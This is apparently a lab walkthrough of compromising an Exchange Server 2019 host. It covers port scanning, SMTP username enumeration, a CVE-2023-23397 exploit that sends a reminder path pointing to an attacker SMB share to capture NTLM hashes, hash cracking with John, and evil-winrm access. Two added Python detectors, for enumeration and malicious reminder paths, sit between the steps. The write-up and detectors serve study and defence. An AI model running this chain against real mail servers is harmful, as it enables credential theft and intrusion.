OWA Exchange Server 2019

Exchange Server 2019

Nmap

nmap -p- -A <IP> -oA myHost                                     
Starting Nmap 7.93 ( https://nmap.org ) at XXX EDT
PORT      STATE SERVICE              VERSION
25/tcp    open  smtp                 Microsoft Exchange smtpd
| smtp-commands: ad.domain Hello [10.10.16.158], SIZE, PI

53/tcp    open  domain               Simple DNS Plus
80/tcp    open  http                 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
81/tcp    open  http                 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: 403 - Forbidden: Access is denied.
88/tcp    open  kerberos-sec         Microsoft Windows Kerberos (server time: XXXX-XX)
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
389/tcp   open  ldap                 Microsoft Windows Active Directory LDAP (Domain:DOMAIN
443/tcp   open  ssl/https
444/tcp   open  snpp?
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
465/tcp   open  smtp                 Microsoft Exchange smtpd
587/tcp   open  smtp                 Microsoft Exchange smtpd
593/tcp   open  ncacn_http           Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
717/tcp   open  smtp                 Microsoft Exchange smtpd
808/tcp   open  ccproxy-http?
890/tcp   open  mc-nmf               .NET Message Framing
1801/tcp  open  msmq?
2103/tcp  open  msrpc                Microsoft Windows RPC
2105/tcp  open  msrpc                Microsoft Windows RPC
2107/tcp  open  msrpc                Microsoft Windows RPC
3268/tcp  open  ldap                 Microsoft Windows Active Directory LDAP (Domain: DOMAIN., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
3389/tcp  open  ms-wbt-server        Microsoft Terminal Services
| ssl-cert: Subject: commonName=DOMAIN
| Not valid before: X
|_Not valid after:  X
| rdp-ntlm-info: 
|   Target_Name: DOMAIN
|   NetBIOS_Domain_Name: DOMAIN
|   NetBIOS_Computer_Name: DOMAIN
|   DNS_Domain_Name: DOMAIN
|   DNS_Computer_Name: DOMAIN
|   DNS_Tree_Name: DOMAIN
|   Product_Version: 10.0.17763
|_  System_Time: XXX
3875/tcp  open  msexchange-logcopier Microsoft Exchange 2010 log copier
5985/tcp  open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6001/tcp  open  ncacn_http           Microsoft Windows RPC over HTTP 1.0
6067/tcp  open  msrpc                Microsoft Windows RPC
...
64327/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
64337/tcp open  mc-nmf               .NET Message Framing

OWA - HTTPS 443

https://github.com/kh4sh3i/exchange-penetration-testing.git

git clone https://github.com/kh4sh3i/exchange-penetration-testing.git


cd exchange-penetration-testing

python3 get_exchange_version.py https://10.129.229.14

Build number:15.2.1118
Exchange Server 2019

SMTP

https://github.com/danielmiessler/SecLists/blob/master/Usernames/xato-net-10-million-usernames.txt?raw=true

wget https://github.com/danielmiessler/SecLists/blob/master/Usernames/xato-net-10-million-usernames.txt?raw=true

smtp-user-enum -M RCPT -D ad.domain -t 10.129.229.14 -U ./xato-net-10-million-usernames.txt


smtp-user-enum -M RCPT -D ad.domain -t 10.129.229.14 -U ./users.txt

└─# smtp-user-enum -M RCPT -D ad.domain -t 10.129.229.14 -U ./users.txt
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... ./users.txt
Target count ............. 1
Username count ........... 8295455
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ <DOMAIN>

######## Scan started at Thu XXX #########
10.129.229.14: valdaccount@DOMAIN exists
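On the defending side, RCPT-mode enumeration like the run above leaves a distinctive trace: one client burning through many different recipients and collecting mostly 5xx rejections in a short window. The following is an added detection example, not part of these notes or of smtp-user-enum; the log line format, the sample lines and the thresholds are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not from the page), one per RCPT TO attempt; a 5xx code means rejected.
SAMPLE_LOG = """\
2024-05-01T10:00:00 client=10.10.16.158 rcpt=aaron@ad.domain code=550
2024-05-01T10:00:00 client=10.10.16.158 rcpt=abby@ad.domain code=550
2024-05-01T10:00:01 client=10.10.16.158 rcpt=adam@ad.domain code=550
2024-05-01T10:00:01 client=10.10.20.5 rcpt=valdaccount@ad.domain code=250
2024-05-01T10:00:02 client=10.10.16.158 rcpt=alex@ad.domain code=550
2024-05-01T10:00:02 client=10.10.16.158 rcpt=valdaccount@ad.domain code=250
2024-05-01T10:00:03 client=10.10.16.158 rcpt=amy@ad.domain code=550
2024-05-01T10:05:00 client=10.10.20.5 rcpt=typo@ad.domain code=550
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) client=(?P<ip>\S+) rcpt=(?P<rcpt>\S+) code=(?P<code>\d{3})$")

def parse_log(text):
    """Return (timestamp, client_ip, recipient, smtp_code) for each well-formed line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["ip"], m["rcpt"], int(m["code"])))
    return events

def find_rcpt_enumeration(events, window_s=60, min_rejects=4, min_distinct=4):
    """Return {client_ip: (rejects, distinct_recipients)} for every client that, inside some
    window_s-second window, got >= min_rejects 5xx replies across >= min_distinct recipients."""
    by_ip = defaultdict(list)
    for ts, ip, rcpt, code in events:
        by_ip[ip].append((ts, rcpt, code))
    flagged = {}
    for ip, evs in by_ip.items():
        evs.sort()
        for i, (start, _, _) in enumerate(evs):
            in_window = [e for e in evs[i:] if e[0] - start < timedelta(seconds=window_s)]
            rejects = sum(1 for e in in_window if 500 <= e[2] < 600)
            distinct = len({e[1] for e in in_window})
            if rejects >= min_rejects and distinct >= min_distinct:
                flagged[ip] = (rejects, distinct)
                break
    return flagged

if __name__ == "__main__":
    print(find_rcpt_enumeration(parse_log(SAMPLE_LOG)))
```

The legitimate client that mistypes one address is not reported; the thresholds are the knob to tune against real traffic.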

CVE-2023-23397

git clone https://github.com/BronzeBee/cve-2023-23397.git

┌──(kali㉿kali)-[/HTB/OWA/cve-2023-23397]
└─$ python cve-2023-23397.py -s 10.129.229.110 -f fromemail@email -t toemail@email -p '\\10.10.16.158\test'
[*] CVE-2023-23397 exploit
[*] Author: @bronzebee

[*] Connecting to 10.129.229.110:25
[*] Sending message to discovered@validaccount.domain
[*] Message sent to all addresses successfully
[*] Total messages sent: 1/1

The exploit requires an SMB server (impacket) to be running first:

impacket-smbserver -smb2support share .
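CVE-2023-23397 works by planting a UNC path, like the `-p` value above, in the reminder sound file property of a calendar or task item so that Outlook authenticates to that share. As an added defender-side check (not part of these notes or the exploit repository), the function below classifies reminder-file values pulled from mailbox items and reports UNC paths to hosts that are not on an allowlist; the item records, the allowlisted file server and the domain suffix are constructed assumptions.

```python
import ipaddress
import re

# Assumed allowlist of internal file servers that legitimately host reminder sounds.
ALLOWED_HOSTS = {"fileserver.ad.domain"}

# Constructed reminder-sound values (not real data from the page) as they might be
# pulled from calendar/task items; only the last two should be reported.
SAMPLE_ITEMS = [
    {"subject": "Team sync", "reminder_file": None},
    {"subject": "Standup", "reminder_file": r"C:\Windows\Media\Alarm01.wav"},
    {"subject": "Review", "reminder_file": r"\\fileserver.ad.domain\sounds\ding.wav"},
    {"subject": "Reminder", "reminder_file": r"\\10.10.16.158\test"},
    {"subject": "Reminder", "reminder_file": r"\\203.0.113.7@80\share\x"},  # WebDAV host@port form
]

UNC_RE = re.compile(r"^[\\/]{2}(?P<host>[^\\/]+)")

def unc_host(value):
    """Host named by a UNC or WebDAV-style path, lower-cased and stripped of any
    '@SSL'/'@port' suffix; None when the value is empty or a local path."""
    if not value:
        return None
    m = UNC_RE.match(value.strip())
    return m["host"].split("@")[0].lower() if m else None

def check_reminder_path(value, allowlist=ALLOWED_HOSTS):
    """'ok' for empty, local or allowlisted values; otherwise a reason string
    describing why the value looks like a CVE-2023-23397-style reminder path."""
    host = unc_host(value)
    if host is None or host in allowlist:
        return "ok"
    try:
        ipaddress.ip_address(host)
        return f"UNC reminder path to raw IP {host}"
    except ValueError:
        return f"UNC reminder path to non-allowlisted host {host}"

def scan_items(items):
    """Return (subject, value, reason) for every item whose reminder path is suspicious."""
    findings = []
    for item in items:
        reason = check_reminder_path(item["reminder_file"])
        if reason != "ok":
            findings.append((item["subject"], item["reminder_file"], reason))
    return findings

if __name__ == "__main__":
    for subject, value, reason in scan_items(SAMPLE_ITEMS):
        print(f"{subject!r}: {reason} ({value})")
```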

John the Ripper - crack NTLM hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

WinRM - TCP 5985

evil-winrm -i 10.129.229.14 -u validaccount -p 'password'
